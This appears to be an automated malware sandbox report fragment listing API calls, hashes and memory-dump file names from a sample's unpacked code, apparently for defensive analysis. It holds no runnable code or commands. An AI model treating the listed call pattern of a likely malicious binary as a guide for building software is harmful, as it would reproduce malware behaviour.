                                                                                                                                                                                                                      • Opcode ID: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                                                                      • Instruction ID: 99a9e5799e649aa26cca8c53ff1b95307459894a29596d3904e707583eccb788
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A516EB9681141AFCB86DF54EC99811BBBABB4C35431600ADE9758B370F7F1AC08DB19
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,0067D0F7,?,?,?,?), ref: 004313AA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                      • String ID: " $^\w$^\w
                                                                                                                                                                                                                      • API String ID: 3660427363-1957396040
                                                                                                                                                                                                                      • Opcode ID: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
                                                                                                                                                                                                                      • Instruction ID: 0d34f9e0d8b49bd60d604e6c48f6b3b48a5b9a3a064a98a57d4dcc57e91ac9fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CF01879641110BFD214DF44DC89EA5B7BCEF55710F144869F948D7320EA64BC118A66
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0067CC40), ref: 0041C8FB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0067CC49), ref: 0041C92E
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041C979
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0067CC4F), ref: 0041C9C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4038537762-0
                                                                                                                                                                                                                      • Opcode ID: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
                                                                                                                                                                                                                      • Instruction ID: 91129cc135b6de1bd884046890de669bd94a0d0b4a39d456f35227959ca6c7b2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC5183B6A00115AFCB04DF98DD81AD9B3B4FF58310B084479E906D3361FBB8AA59CF55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                      • String ID: 0$ 0
                                                                                                                                                                                                                      • API String ID: 1304948518-2612948726
                                                                                                                                                                                                                      • Opcode ID: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                                                                      • Instruction ID: de3a1f93126c12deb6ed219e4da2e682fdb512e8e31929a1438dbe72cb210f2e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F316D76B000509FCB45DF9CDCE0EDD73F1AF89704B0801B9E50AE3361EA70AA198B5A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0043D262
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventOpen
                                                                                                                                                                                                                      • String ID: -E~$z0_
                                                                                                                                                                                                                      • API String ID: 3658969616-3497079166
                                                                                                                                                                                                                      • Opcode ID: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                                                                      • Instruction ID: 4c960738fd572624f98c33cf1521ed59ac4ed7dc924c0bf984625c0e848ba6ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A216F727012149FC794DF9DDC91FA973B9AF88604B0441BDE809D3351EEB0AE898B5A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                      • String ID: 0$ 0
                                                                                                                                                                                                                      • API String ID: 1304948518-2612948726
                                                                                                                                                                                                                      • Opcode ID: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                                                                      • Instruction ID: 46ca0ec3ac5e7fe645135cbb6742112b101b88f065de0e8023397726ea1268d6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4018C3AB40100AFD744DF68DD91E4833E69BCA200B1906B9ED05D33A1E5B0AC458B56
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Network), ref: 0041ED6E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 0$Network
                                                                                                                                                                                                                      • API String ID: 0-350251746
                                                                                                                                                                                                                      • Opcode ID: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                                                                      • Instruction ID: f80f0783777fa5cc836e735bdae024c9e7f2125abd3eb6355b1fadc9e12c604f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4E04F7960020ADFC708DF24DEA4994B3BAFFC6248B094564DD099B235E7B1BC46CB55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                                                                      • Instruction ID: c250d11b6629f2eea65e49512af102c608c6350f49251a8cd05842a55814024d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49116DB2D101286BE7109AA5DC49E9B7EBCEB85358F04042EF508D7241E6B59A44CBE4